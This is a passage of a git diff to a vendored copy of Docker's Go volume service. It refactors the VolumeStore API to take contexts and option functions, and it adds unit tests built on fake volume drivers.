+
 	var out []volume.Volume
 
 	for _, v := range vols {
-		name := normaliseVolumeName(v.Name())
+		name := normalizeVolumeName(v.Name())
 
 		s.locks.Lock(name)
 		storedV, exists := s.getNamed(name)
@@ -187,26 +354,59 @@ func (s *VolumeStore) List() ([]volume.Volume, []string, error) {
 	return out, warnings, nil
 }
 
+type filterFunc func(volume.Volume) bool
+
+func filter(vols *[]volume.Volume, fn filterFunc) {
+	var evict []int
+	for i, v := range *vols {
+		if !fn(v) {
+			evict = append(evict, i)
+		}
+	}
+
+	for n, i := range evict {
+		copy((*vols)[i-n:], (*vols)[i-n+1:])
+		(*vols)[len(*vols)-1] = nil
+		*vols = (*vols)[:len(*vols)-1]
+	}
+}
+
 // list goes through each volume driver and asks for its list of volumes.
-func (s *VolumeStore) list() ([]volume.Volume, []string, error) {
+// TODO(@cpuguy83): plumb context through
+func (s *VolumeStore) list(ctx context.Context, driverNames ...string) ([]volume.Volume, []string, error) {
 	var (
-		ls       []volume.Volume
+		ls       = []volume.Volume{} // do not return a nil value as this affects filtering
 		warnings []string
 	)
 
-	drivers, err := volumedrivers.GetAllDrivers()
+	var dls []volume.Driver
+
+	all, err := s.drivers.GetAllDrivers()
 	if err != nil {
 		return nil, nil, err
 	}
+	if len(driverNames) == 0 {
+		dls = all
+	} else {
+		idx := make(map[string]bool, len(driverNames))
+		for _, name := range driverNames {
+			idx[name] = true
+		}
+		for _, d := range all {
+			if idx[d.Name()] {
+				dls = append(dls, d)
+			}
+		}
+	}
 
 	type vols struct {
 		vols       []volume.Volume
 		err        error
 		driverName string
 	}
-	chVols := make(chan vols, len(drivers))
+	chVols := make(chan vols, len(dls))
 
-	for _, vd := range drivers {
+	for _, vd := range dls {
 		go func(d volume.Driver) {
 			vs, err := d.List()
 			if err != nil {
@@ -224,13 +424,12 @@ func (s *VolumeStore) list() ([]volume.Volume, []string, error) {
 	}
 
 	badDrivers := make(map[string]struct{})
-	for i := 0; i < len(drivers); i++ {
+	for i := 0; i < len(dls); i++ {
 		vs := <-chVols
 
 		if vs.err != nil {
 			warnings = append(warnings, vs.err.Error())
 			badDrivers[vs.driverName] = struct{}{}
-			logrus.Warn(vs.err)
 		}
 		ls = append(ls, vs.vols...)
 	}
@@ -247,28 +446,37 @@ func (s *VolumeStore) list() ([]volume.Volume, []string, error) {
 	return ls, warnings, nil
 }
 
-// CreateWithRef creates a volume with the given name and driver and stores the ref
-// This ensures there's no race between creating a volume and then storing a reference.
-func (s *VolumeStore) CreateWithRef(name, driverName, ref string, opts, labels map[string]string) (volume.Volume, error) {
-	name = normaliseVolumeName(name)
+// Create creates a volume with the given name and driver
+// If the volume needs to be created with a reference to prevent race conditions
+// with volume cleanup, make sure to use the `CreateWithReference` option.
+func (s *VolumeStore) Create(ctx context.Context, name, driverName string, createOpts ...opts.CreateOption) (volume.Volume, error) {
+	var cfg opts.CreateConfig
+	for _, o := range createOpts {
+		o(&cfg)
+	}
+
+	name = normalizeVolumeName(name)
 	s.locks.Lock(name)
 	defer s.locks.Unlock(name)
 
-	v, err := s.create(name, driverName, opts, labels)
+	select {
+	case <-ctx.Done():
+		return nil, ctx.Err()
+	default:
+	}
+
+	v, err := s.create(ctx, name, driverName, cfg.Options, cfg.Labels)
 	if err != nil {
+		if _, ok := err.(*OpErr); ok {
+			return nil, err
+		}
 		return nil, &OpErr{Err: err, Name: name, Op: "create"}
 	}
 
-	s.setNamed(v, ref)
+	s.setNamed(v, cfg.Reference)
 	return v, nil
 }
 
-// Create creates a volume with the given name and driver.
-// This is just like CreateWithRef() except we don't store a reference while holding the lock.
-func (s *VolumeStore) Create(name, driverName string, opts, labels map[string]string) (volume.Volume, error) {
-	return s.CreateWithRef(name, driverName, "", opts, labels)
-}
-
 // checkConflict checks the local cache for name collisions with the passed in name,
 // for existing volumes with the same name but in a different driver.
 // This is used by `Create` as a best effort to prevent name collisions for volumes.
@@ -282,7 +490,7 @@ func (s *VolumeStore) Create(name, driverName string, opts, labels map[string]st
 // TODO(cpuguy83): With v2 plugins this shouldn't be a problem. Could also potentially
 // use a connect timeout for this kind of check to ensure we aren't blocking for a
 // long time.
-func (s *VolumeStore) checkConflict(name, driverName string) (volume.Volume, error) {
+func (s *VolumeStore) checkConflict(ctx context.Context, name, driverName string) (volume.Volume, error) {
 	// check the local cache
 	v, _ := s.getNamed(name)
 	if v == nil {
@@ -294,7 +502,7 @@ func (s *VolumeStore) checkConflict(name, driverName string) (volume.Volume, err
 	if driverName != "" {
 		// Retrieve canonical driver name to avoid inconsistencies (for example
 		// "plugin" vs. "plugin:latest")
-		vd, err := volumedrivers.GetDriver(driverName)
+		vd, err := s.drivers.GetDriver(driverName)
 		if err != nil {
 			return nil, err
 		}
@@ -306,7 +514,7 @@ func (s *VolumeStore) checkConflict(name, driverName string) (volume.Volume, err
 
 	// let's check if the found volume ref
 	// is stale by checking with the driver if it still exists
-	exists, err := volumeExists(v)
+	exists, err := volumeExists(ctx, s.drivers, v)
 	if err != nil {
 		return nil, errors.Wrapf(errNameConflict, "found reference to volume '%s' in driver '%s', but got an error while checking the driver: %v", name, vDriverName, err)
 	}
@@ -318,21 +526,21 @@ func (s *VolumeStore) checkConflict(name, driverName string) (volume.Volume, err
 		return v, nil
 	}
 
-	if len(s.getRefs(v.Name())) > 0 {
+	if s.hasRef(v.Name()) {
 		// Containers are referencing this volume but it doesn't seem to exist anywhere.
 		// Return a conflict error here, the user can fix this with `docker volume rm -f`
 		return nil, errors.Wrapf(errNameConflict, "found references to volume '%s' in driver '%s' but the volume was not found in the driver -- you may need to remove containers referencing this volume or force remove the volume to re-create it", name, vDriverName)
 	}
 
 	// doesn't exist, so purge it from the cache
-	s.Purge(name)
+	s.purge(ctx, name)
 	return nil, nil
 }
 
 // volumeExists returns if the volume is still present in the driver.
 // An error is returned if there was an issue communicating with the driver.
-func volumeExists(v volume.Volume) (bool, error) {
-	exists, err := lookupVolume(v.DriverName(), v.Name())
+func volumeExists(ctx context.Context, store *drivers.Store, v volume.Volume) (bool, error) {
+	exists, err := lookupVolume(ctx, store, v.DriverName(), v.Name())
 	if err != nil {
 		return false, err
 	}
@@ -345,51 +553,61 @@ func volumeExists(v volume.Volume) (bool, error) {
 //  for the given volume name, an error is returned after checking if the reference is stale.
 // If the reference is stale, it will be purged and this create can continue.
 // It is expected that callers of this function hold any necessary locks.
-func (s *VolumeStore) create(name, driverName string, opts, labels map[string]string) (volume.Volume, error) {
+func (s *VolumeStore) create(ctx context.Context, name, driverName string, opts, labels map[string]string) (volume.Volume, error) {
 	// Validate the name in a platform-specific manner
-	valid, err := volume.IsVolumeNameValid(name)
+
+	// volume name validation is specific to the host os and not on container image
+	// windows/lcow should have an equivalent volumename validation logic so we create a parser for current host OS
+	parser := volumemounts.NewParser(runtime.GOOS)
+	err := parser.ValidateVolumeName(name)
 	if err != nil {
 		return nil, err
 	}
-	if !valid {
-		return nil, &OpErr{Err: errInvalidName, Name: name, Op: "create"}
-	}
 
-	v, err := s.checkConflict(name, driverName)
+	v, err := s.checkConflict(ctx, name, driverName)
 	if err != nil {
 		return nil, err
 	}
 
 	if v != nil {
-		return v, nil
+		// there is an existing volume, if we already have this stored locally, return it.
+		// TODO: there could be some inconsistent details such as labels here
+		if vv, _ := s.getNamed(v.Name()); vv != nil {
+			return vv, nil
+		}
 	}
 
 	// Since there isn't a specified driver name, let's see if any of the existing drivers have this volume name
 	if driverName == "" {
-		v, _ := s.getVolume(name)
+		v, _ = s.getVolume(ctx, name, "")
 		if v != nil {
 			return v, nil
 		}
 	}
 
-	vd, err := volumedrivers.CreateDriver(driverName)
-
+	if driverName == "" {
+		driverName = volume.DefaultDriverName
+	}
+	vd, err := s.drivers.CreateDriver(driverName)
 	if err != nil {
 		return nil, &OpErr{Op: "create", Name: name, Err: err}
 	}
 
 	logrus.Debugf("Registering new volume reference: driver %q, name %q", vd.Name(), name)
-
-	if v, _ := vd.Get(name); v != nil {
-		return v, nil
-	}
-	v, err = vd.Create(name, opts)
-	if err != nil {
-		return nil, err
+	if v, _ = vd.Get(name); v == nil {
+		v, err = vd.Create(name, opts)
+		if err != nil {
+			if _, err := s.drivers.ReleaseDriver(driverName); err != nil {
+				logrus.WithError(err).WithField("driver", driverName).Error("Error releasing reference to volume driver")
+			}
+			return nil, err
+		}
 	}
+
 	s.globalLock.Lock()
 	s.labels[name] = labels
 	s.options[name] = opts
+	s.refs[name] = make(map[string]struct{})
 	s.globalLock.Unlock()
 
 	metadata := volumeMetadata{
@@ -405,58 +623,57 @@ func (s *VolumeStore) create(name, driverName string, opts, labels map[string]st
 	return volumeWrapper{v, labels, vd.Scope(), opts}, nil
 }
 
-// GetWithRef gets a volume with the given name from the passed in driver and stores the ref
-// This is just like Get(), but we store the reference while holding the lock.
-// This makes sure there are no races between checking for the existence of a volume and adding a reference for it
-func (s *VolumeStore) GetWithRef(name, driverName, ref string) (volume.Volume, error) {
-	name = normaliseVolumeName(name)
-	s.locks.Lock(name)
-	defer s.locks.Unlock(name)
-
-	vd, err := volumedrivers.GetDriver(driverName)
-	if err != nil {
-		return nil, &OpErr{Err: err, Name: name, Op: "get"}
-	}
-
-	v, err := vd.Get(name)
-	if err != nil {
-		return nil, &OpErr{Err: err, Name: name, Op: "get"}
-	}
-
-	s.setNamed(v, ref)
-
-	s.globalLock.RLock()
-	defer s.globalLock.RUnlock()
-	return volumeWrapper{v, s.labels[name], vd.Scope(), s.options[name]}, nil
-}
-
 // Get looks if a volume with the given name exists and returns it if so
-func (s *VolumeStore) Get(name string) (volume.Volume, error) {
-	name = normaliseVolumeName(name)
+func (s *VolumeStore) Get(ctx context.Context, name string, getOptions ...opts.GetOption) (volume.Volume, error) {
+	var cfg opts.GetConfig
+	for _, o := range getOptions {
+		o(&cfg)
+	}
+	name = normalizeVolumeName(name)
 	s.locks.Lock(name)
 	defer s.locks.Unlock(name)
 
-	v, err := s.getVolume(name)
+	v, err := s.getVolume(ctx, name, cfg.Driver)
 	if err != nil {
 		return nil, &OpErr{Err: err, Name: name, Op: "get"}
 	}
-	s.setNamed(v, "")
+	if cfg.Driver != "" && v.DriverName() != cfg.Driver {
+		return nil, &OpErr{Name: name, Op: "get", Err: errdefs.Conflict(errors.New("found volume driver does not match passed in driver"))}
+	}
+	s.setNamed(v, cfg.Reference)
 	return v, nil
 }
 
 // getVolume requests the volume, if the driver info is stored it just accesses that driver,
 // if the driver is unknown it probes all drivers until it finds the first volume with that name.
 // it is expected that callers of this function hold any necessary locks
-func (s *VolumeStore) getVolume(name string) (volume.Volume, error) {
+func (s *VolumeStore) getVolume(ctx context.Context, name, driverName string) (volume.Volume, error) {
 	var meta volumeMetadata
 	meta, err := s.getMeta(name)
 	if err != nil {
 		return nil, err
 	}
 
-	driverName := meta.Driver
+	if driverName != "" {
+		if meta.Driver == "" {
+			meta.Driver = driverName
+		}
+		if driverName != meta.Driver {
+			return nil, errdefs.Conflict(errors.New("provided volume driver does not match stored driver"))
+		}
+	}
+
+	if driverName == "" {
+		driverName = meta.Driver
+	}
 	if driverName == "" {
 		s.globalLock.RLock()
+		select {
+		case <-ctx.Done():
+			s.globalLock.RUnlock()
+			return nil, ctx.Err()
+		default:
+		}
 		v, exists := s.names[name]
 		s.globalLock.RUnlock()
 		if exists {
@@ -468,17 +685,17 @@ func (s *VolumeStore) getVolume(name string) (volume.Volume, error) {
 	}
 
 	if meta.Driver != "" {
-		vol, err := lookupVolume(meta.Driver, name)
+		vol, err := lookupVolume(ctx, s.drivers, meta.Driver, name)
 		if err != nil {
 			return nil, err
 		}
 		if vol == nil {
-			s.Purge(name)
+			s.purge(ctx, name)
 			return nil, errNoSuchVolume
 		}
 
 		var scope string
-		vd, err := volumedrivers.GetDriver(meta.Driver)
+		vd, err := s.drivers.GetDriver(meta.Driver)
 		if err == nil {
 			scope = vd.Scope()
 		}
@@ -486,12 +703,17 @@ func (s *VolumeStore) getVolume(name string) (volume.Volume, error) {
 	}
 
 	logrus.Debugf("Probing all drivers for volume with name: %s", name)
-	drivers, err := volumedrivers.GetAllDrivers()
+	drivers, err := s.drivers.GetAllDrivers()
 	if err != nil {
 		return nil, err
 	}
 
 	for _, d := range drivers {
+		select {
+		case <-ctx.Done():
+			return nil, ctx.Err()
+		default:
+		}
 		v, err := d.Get(name)
 		if err != nil || v == nil {
 			continue
@@ -510,8 +732,12 @@ func (s *VolumeStore) getVolume(name string) (volume.Volume, error) {
 // If the driver returns an error that is not communication related the
 //   error is logged but not returned.
 // If the volume is not found it will return `nil, nil``
-func lookupVolume(driverName, volumeName string) (volume.Volume, error) {
-	vd, err := volumedrivers.GetDriver(driverName)
+// TODO(@cpuguy83): plumb through the context to lower level components
+func lookupVolume(ctx context.Context, store *drivers.Store, driverName, volumeName string) (volume.Volume, error) {
+	if driverName == "" {
+		driverName = volume.DefaultDriverName
+	}
+	vd, err := store.GetDriver(driverName)
 	if err != nil {
 		return nil, errors.Wrapf(err, "error while checking if volume %q exists in driver %q", volumeName, driverName)
 	}
@@ -519,119 +745,102 @@ func lookupVolume(driverName, volumeName string) (volume.Volume, error) {
 	if err != nil {
 		err = errors.Cause(err)
 		if _, ok := err.(net.Error); ok {
-			return nil, errors.Wrapf(err, "error while checking if volume %q exists in driver %q", v.Name(), v.DriverName())
+			if v != nil {
+				volumeName = v.Name()
+				driverName = v.DriverName()
+			}
+			return nil, errors.Wrapf(err, "error while checking if volume %q exists in driver %q", volumeName, driverName)
 		}
 
 		// At this point, the error could be anything from the driver, such as "no such volume"
 		// Let's not check an error here, and instead check if the driver returned a volume
-		logrus.WithError(err).WithField("driver", driverName).WithField("volume", volumeName).Warnf("Error while looking up volume")
+		logrus.WithError(err).WithField("driver", driverName).WithField("volume", volumeName).Debug("Error while looking up volume")
 	}
 	return v, nil
 }
 
 // Remove removes the requested volume. A volume is not removed if it has any refs
-func (s *VolumeStore) Remove(v volume.Volume) error {
-	name := normaliseVolumeName(v.Name())
+func (s *VolumeStore) Remove(ctx context.Context, v volume.Volume, rmOpts ...opts.RemoveOption) error {
+	var cfg opts.RemoveConfig
+	for _, o := range rmOpts {
+		o(&cfg)
+	}
+
+	name := v.Name()
 	s.locks.Lock(name)
 	defer s.locks.Unlock(name)
 
-	refs := s.getRefs(name)
-	if len(refs) > 0 {
-		return &OpErr{Err: errVolumeInUse, Name: v.Name(), Op: "remove", Refs: refs}
+	select {
+	case <-ctx.Done():
+		return ctx.Err()
+	default:
+	}
+
+	if s.hasRef(name) {
+		return &OpErr{Err: errVolumeInUse, Name: name, Op: "remove", Refs: s.getRefs(name)}
 	}
 
-	vd, err := volumedrivers.GetDriver(v.DriverName())
+	v, err := s.getVolume(ctx, name, v.DriverName())
 	if err != nil {
-		return &OpErr{Err: err, Name: vd.Name(), Op: "remove"}
+		return err
+	}
+
+	vd, err := s.drivers.GetDriver(v.DriverName())
+	if err != nil {
+		return &OpErr{Err: err, Name: v.DriverName(), Op: "remove"}
 	}
 
 	logrus.Debugf("Removing volume reference: driver %s, name %s", v.DriverName(), name)
 	vol := unwrapVolume(v)
-	if err := vd.Remove(vol); err != nil {
-		return &OpErr{Err: err, Name: name, Op: "remove"}
+
+	err = vd.Remove(vol)
+	if err != nil {
+		err = &OpErr{Err: err, Name: name, Op: "remove"}
 	}
 
-	s.Purge(name)
-	return nil
+	if err == nil || cfg.PurgeOnError {
+		if e := s.purge(ctx, name); e != nil && err == nil {
+			err = e
+		}
+	}
+	return err
 }
 
-// Dereference removes the specified reference to the volume
-func (s *VolumeStore) Dereference(v volume.Volume, ref string) {
-	s.locks.Lock(v.Name())
-	defer s.locks.Unlock(v.Name())
+// Release releases the specified reference to the volume
+func (s *VolumeStore) Release(ctx context.Context, name string, ref string) error {
+	s.locks.Lock(name)
+	defer s.locks.Unlock(name)
+	select {
+	case <-ctx.Done():
+		return ctx.Err()
+	default:
+	}
 
 	s.globalLock.Lock()
 	defer s.globalLock.Unlock()
-	var refs []string
 
-	for _, r := range s.refs[v.Name()] {
-		if r != ref {
-			refs = append(refs, r)
-		}
+	select {
+	case <-ctx.Done():
+		return ctx.Err()
+	default:
 	}
-	s.refs[v.Name()] = refs
-}
-
-// Refs gets the current list of refs for the given volume
-func (s *VolumeStore) Refs(v volume.Volume) []string {
-	s.locks.Lock(v.Name())
-	defer s.locks.Unlock(v.Name())
-
-	refs := s.getRefs(v.Name())
-	refsOut := make([]string, len(refs))
-	copy(refsOut, refs)
-	return refsOut
-}
 
-// FilterByDriver returns the available volumes filtered by driver name
-func (s *VolumeStore) FilterByDriver(name string) ([]volume.Volume, error) {
-	vd, err := volumedrivers.GetDriver(name)
-	if err != nil {
-		return nil, &OpErr{Err: err, Name: name, Op: "list"}
-	}
-	ls, err := vd.List()
-	if err != nil {
-		return nil, &OpErr{Err: err, Name: name, Op: "list"}
+	if s.refs[name] != nil {
+		delete(s.refs[name], ref)
 	}
-	for i, v := range ls {
-		options := map[string]string{}
-		s.globalLock.RLock()
-		for key, value := range s.options[v.Name()] {
-			options[key] = value
-		}
-		ls[i] = volumeWrapper{v, s.labels[v.Name()], vd.Scope(), options}
-		s.globalLock.RUnlock()
-	}
-	return ls, nil
+	return nil
 }
 
-// FilterByUsed returns the available volumes filtered by if they are in use or not.
-// `used=true` returns only volumes that are being used, while `used=false` returns
-// only volumes that are not being used.
-func (s *VolumeStore) FilterByUsed(vols []volume.Volume, used bool) []volume.Volume {
-	return s.filter(vols, func(v volume.Volume) bool {
-		s.locks.Lock(v.Name())
-		l := len(s.getRefs(v.Name()))
-		s.locks.Unlock(v.Name())
-		if (used && l > 0) || (!used && l == 0) {
-			return true
-		}
-		return false
-	})
-}
+// CountReferences gives a count of all references for a given volume.
+func (s *VolumeStore) CountReferences(v volume.Volume) int {
+	name := normalizeVolumeName(v.Name())
 
-// filterFunc defines a function to allow filter volumes in the store
-type filterFunc func(vol volume.Volume) bool
+	s.locks.Lock(name)
+	defer s.locks.Unlock(name)
+	s.globalLock.Lock()
+	defer s.globalLock.Unlock()
 
-// filter returns the available volumes filtered by a filterFunc function
-func (s *VolumeStore) filter(vols []volume.Volume, f filterFunc) []volume.Volume {
-	var ls []volume.Volume
-	for _, v := range vols {
-		if f(v) {
-			ls = append(ls, v)
-		}
-	}
-	return ls
+	return len(s.refs[name])
 }
 
 func unwrapVolume(v volume.Volume) volume.Volume {
diff --git a/vendor/github.com/docker/docker/volume/service/store_test.go b/vendor/github.com/docker/docker/volume/service/store_test.go
new file mode 100644
index 0000000000..53345f318b
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/service/store_test.go
@@ -0,0 +1,421 @@
+package service // import "github.com/docker/docker/volume/service"
+
+import (
+	"context"
+	"errors"
+	"fmt"
+	"io/ioutil"
+	"net"
+	"os"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/volume"
+	volumedrivers "github.com/docker/docker/volume/drivers"
+	"github.com/docker/docker/volume/service/opts"
+	volumetestutils "github.com/docker/docker/volume/testutils"
+	"github.com/google/go-cmp/cmp"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestCreate(t *testing.T) {
+	t.Parallel()
+
+	s, cleanup := setupTest(t)
+	defer cleanup()
+	s.drivers.Register(volumetestutils.NewFakeDriver("fake"), "fake")
+
+	ctx := context.Background()
+	v, err := s.Create(ctx, "fake1", "fake")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if v.Name() != "fake1" {
+		t.Fatalf("Expected fake1 volume, got %v", v)
+	}
+	if l, _, _ := s.Find(ctx, nil); len(l) != 1 {
+		t.Fatalf("Expected 1 volume in the store, got %v: %v", len(l), l)
+	}
+
+	if _, err := s.Create(ctx, "none", "none"); err == nil {
+		t.Fatalf("Expected unknown driver error, got nil")
+	}
+
+	_, err = s.Create(ctx, "fakeerror", "fake", opts.WithCreateOptions(map[string]string{"error": "create error"}))
+	expected := &OpErr{Op: "create", Name: "fakeerror", Err: errors.New("create error")}
+	if err != nil && err.Error() != expected.Error() {
+		t.Fatalf("Expected create fakeError: create error, got %v", err)
+	}
+}
+
+func TestRemove(t *testing.T) {
+	t.Parallel()
+
+	s, cleanup := setupTest(t)
+	defer cleanup()
+
+	s.drivers.Register(volumetestutils.NewFakeDriver("fake"), "fake")
+	s.drivers.Register(volumetestutils.NewFakeDriver("noop"), "noop")
+
+	ctx := context.Background()
+
+	// doing string compare here since this error comes directly from the driver
+	expected := "no such volume"
+	var v volume.Volume = volumetestutils.NoopVolume{}
+	if err := s.Remove(ctx, v); err == nil || !strings.Contains(err.Error(), expected) {
+		t.Fatalf("Expected error %q, got %v", expected, err)
+	}
+
+	v, err := s.Create(ctx, "fake1", "fake", opts.WithCreateReference("fake"))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if err := s.Remove(ctx, v); !IsInUse(err) {
+		t.Fatalf("Expected ErrVolumeInUse error, got %v", err)
+	}
+	s.Release(ctx, v.Name(), "fake")
+	if err := s.Remove(ctx, v); err != nil {
+		t.Fatal(err)
+	}
+	if l, _, _ := s.Find(ctx, nil); len(l) != 0 {
+		t.Fatalf("Expected 0 volumes in the store, got %v, %v", len(l), l)
+	}
+}
+
+func TestList(t *testing.T) {
+	t.Parallel()
+
+	dir, err := ioutil.TempDir("", "test-list")
+	assert.NilError(t, err)
+	defer os.RemoveAll(dir)
+
+	drivers := volumedrivers.NewStore(nil)
+	drivers.Register(volumetestutils.NewFakeDriver("fake"), "fake")
+	drivers.Register(volumetestutils.NewFakeDriver("fake2"), "fake2")
+
+	s, err := NewStore(dir, drivers)
+	assert.NilError(t, err)
+
+	ctx := context.Background()
+	if _, err := s.Create(ctx, "test", "fake"); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := s.Create(ctx, "test2", "fake2"); err != nil {
+		t.Fatal(err)
+	}
+
+	ls, _, err := s.Find(ctx, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(ls) != 2 {
+		t.Fatalf("expected 2 volumes, got: %d", len(ls))
+	}
+	if err := s.Shutdown(); err != nil {
+		t.Fatal(err)
+	}
+
+	// and again with a new store
+	s, err = NewStore(dir, drivers)
+	if err != nil {
+		t.Fatal(err)
+	}
+	ls, _, err = s.Find(ctx, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(ls) != 2 {
+		t.Fatalf("expected 2 volumes, got: %d", len(ls))
+	}
+}
+
+func TestFindByDriver(t *testing.T) {
+	t.Parallel()
+	s, cleanup := setupTest(t)
+	defer cleanup()
+
+	assert.Assert(t, s.drivers.Register(volumetestutils.NewFakeDriver("fake"), "fake"))
+	assert.Assert(t, s.drivers.Register(volumetestutils.NewFakeDriver("noop"), "noop"))
+
+	ctx := context.Background()
+	_, err := s.Create(ctx, "fake1", "fake")
+	assert.NilError(t, err)
+
+	_, err = s.Create(ctx, "fake2", "fake")
+	assert.NilError(t, err)
+
+	_, err = s.Create(ctx, "fake3", "noop")
+	assert.NilError(t, err)
+
+	l, _, err := s.Find(ctx, ByDriver("fake"))
+	assert.NilError(t, err)
+	assert.Equal(t, len(l), 2)
+
+	l, _, err = s.Find(ctx, ByDriver("noop"))
+	assert.NilError(t, err)
+	assert.Equal(t, len(l), 1)
+
+	l, _, err = s.Find(ctx, ByDriver("nosuchdriver"))
+	assert.NilError(t, err)
+	assert.Equal(t, len(l), 0)
+}
+
+func TestFindByReferenced(t *testing.T) {
+	t.Parallel()
+	s, cleanup := setupTest(t)
+	defer cleanup()
+
+	s.drivers.Register(volumetestutils.NewFakeDriver("fake"), "fake")
+	s.drivers.Register(volumetestutils.NewFakeDriver("noop"), "noop")
+
+	ctx := context.Background()
+	if _, err := s.Create(ctx, "fake1", "fake", opts.WithCreateReference("volReference")); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := s.Create(ctx, "fake2", "fake"); err != nil {
+		t.Fatal(err)
+	}
+
+	dangling, _, err := s.Find(ctx, ByReferenced(false))
+	assert.Assert(t, err)
+	assert.Assert(t, len(dangling) == 1)
+	assert.Check(t, dangling[0].Name() == "fake2")
+
+	used, _, err := s.Find(ctx, ByReferenced(true))
+	assert.Assert(t, err)
+	assert.Assert(t, len(used) == 1)
+	assert.Check(t, used[0].Name() == "fake1")
+}
+
+func TestDerefMultipleOfSameRef(t *testing.T) {
+	t.Parallel()
+	s, cleanup := setupTest(t)
+	defer cleanup()
+	s.drivers.Register(volumetestutils.NewFakeDriver("fake"), "fake")
+
+	ctx := context.Background()
+	v, err := s.Create(ctx, "fake1", "fake", opts.WithCreateReference("volReference"))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := s.Get(ctx, "fake1", opts.WithGetDriver("fake"), opts.WithGetReference("volReference")); err != nil {
+		t.Fatal(err)
+	}
+
+	s.Release(ctx, v.Name(), "volReference")
+	if err := s.Remove(ctx, v); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestCreateKeepOptsLabelsWhenExistsRemotely(t *testing.T) {
+	t.Parallel()
+	s, cleanup := setupTest(t)
+	defer cleanup()
+
+	vd := volumetestutils.NewFakeDriver("fake")
+	s.drivers.Register(vd, "fake")
+
+	// Create a volume in the driver directly
+	if _, err := vd.Create("foo", nil); err != nil {
+		t.Fatal(err)
+	}
+
+	ctx := context.Background()
+	v, err := s.Create(ctx, "foo", "fake", opts.WithCreateLabels(map[string]string{"hello": "world"}))
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	switch dv := v.(type) {
+	case volume.DetailedVolume:
+		if dv.Labels()["hello"] != "world" {
+			t.Fatalf("labels don't match")
+		}
+	default:
+		t.Fatalf("got unexpected type: %T", v)
+	}
+}
+
+func TestDefererencePluginOnCreateError(t *testing.T) {
+	t.Parallel()
+
+	var (
+		l   net.Listener
+		err error
+	)
+
+	for i := 32768; l == nil && i < 40000; i++ {
+		l, err = net.Listen("tcp", fmt.Sprintf("127.0.0.1:%d", i))
+	}
+	if l == nil {
+		t.Fatalf("could not create listener: %v", err)
+	}
+	defer l.Close()
+
+	s, cleanup := setupTest(t)
+	defer cleanup()
+
+	d := volumetestutils.NewFakeDriver("TestDefererencePluginOnCreateError")
+	p, err := volumetestutils.MakeFakePlugin(d, l)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	pg := volumetestutils.NewFakePluginGetter(p)
+	s.drivers = volumedrivers.NewStore(pg)
+
+	ctx := context.Background()
+	// create a good volume so we have a plugin reference
+	_, err = s.Create(ctx, "fake1", d.Name())
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// Now create another one expecting an error
+	_, err = s.Create(ctx, "fake2", d.Name(), opts.WithCreateOptions(map[string]string{"error": "some error"}))
+	if err == nil || !strings.Contains(err.Error(), "some error") {
+		t.Fatalf("expected an error on create: %v", err)
+	}
+
+	// There should be only 1 plugin reference
+	if refs := volumetestutils.FakeRefs(p); refs != 1 {
+		t.Fatalf("expected 1 plugin reference, got: %d", refs)
+	}
+}
+
+func TestRefDerefRemove(t *testing.T) {
+	t.Parallel()
+
+	driverName := "test-ref-deref-remove"
+	s, cleanup := setupTest(t)
+	defer cleanup()
+	s.drivers.Register(volumetestutils.NewFakeDriver(driverName), driverName)
+
+	ctx := context.Background()
+	v, err := s.Create(ctx, "test", driverName, opts.WithCreateReference("test-ref"))
+	assert.NilError(t, err)
+
+	err = s.Remove(ctx, v)
+	assert.Assert(t, is.ErrorContains(err, ""))
+	assert.Equal(t, errVolumeInUse, err.(*OpErr).Err)
+
+	s.Release(ctx, v.Name(), "test-ref")
+	err = s.Remove(ctx, v)
+	assert.NilError(t, err)
+}
+
+func TestGet(t *testing.T) {
+	t.Parallel()
+
+	driverName := "test-get"
+	s, cleanup := setupTest(t)
+	defer cleanup()
+	s.drivers.Register(volumetestutils.NewFakeDriver(driverName), driverName)
+
+	ctx := context.Background()
+	_, err := s.Get(ctx, "not-exist")
+	assert.Assert(t, is.ErrorContains(err, ""))
+	assert.Equal(t, errNoSuchVolume, err.(*OpErr).Err)
+
+	v1, err := s.Create(ctx, "test", driverName, opts.WithCreateLabels(map[string]string{"a": "1"}))
+	assert.NilError(t, err)
+
+	v2, err := s.Get(ctx, "test")
+	assert.NilError(t, err)
+	assert.DeepEqual(t, v1, v2, cmpVolume)
+
+	dv := v2.(volume.DetailedVolume)
+	assert.Equal(t, "1", dv.Labels()["a"])
+
+	err = s.Remove(ctx, v1)
+	assert.NilError(t, err)
+}
+
+func TestGetWithReference(t *testing.T) {
+	t.Parallel()
+
+	driverName := "test-get-with-ref"
+	s, cleanup := setupTest(t)
+	defer cleanup()
+	s.drivers.Register(volumetestutils.NewFakeDriver(driverName), driverName)
+
+	ctx := context.Background()
+	_, err := s.Get(ctx, "not-exist", opts.WithGetDriver(driverName), opts.WithGetReference("test-ref"))
+	assert.Assert(t, is.ErrorContains(err, ""))
+
+	v1, err := s.Create(ctx, "test", driverName, opts.WithCreateLabels(map[string]string{"a": "1"}))
+	assert.NilError(t, err)
+
+	v2, err := s.Get(ctx, "test", opts.WithGetDriver(driverName), opts.WithGetReference("test-ref"))
+	assert.NilError(t, err)
+	assert.DeepEqual(t, v1, v2, cmpVolume)
+
+	err = s.Remove(ctx, v2)
+	assert.Assert(t, is.ErrorContains(err, ""))
+	assert.Equal(t, errVolumeInUse, err.(*OpErr).Err)
+
+	s.Release(ctx, v2.Name(), "test-ref")
+	err = s.Remove(ctx, v2)
+	assert.NilError(t, err)
+}
+
+var cmpVolume = cmp.AllowUnexported(volumetestutils.FakeVolume{}, volumeWrapper{})
+
+func setupTest(t *testing.T) (*VolumeStore, func()) {
+	t.Helper()
+
+	dirName := strings.Replace(t.Name(), string(os.PathSeparator), "_", -1)
+	dir, err := ioutil.TempDir("", dirName)
+	assert.NilError(t, err)
+
+	cleanup := func() {
+		t.Helper()
+		err := os.RemoveAll(dir)
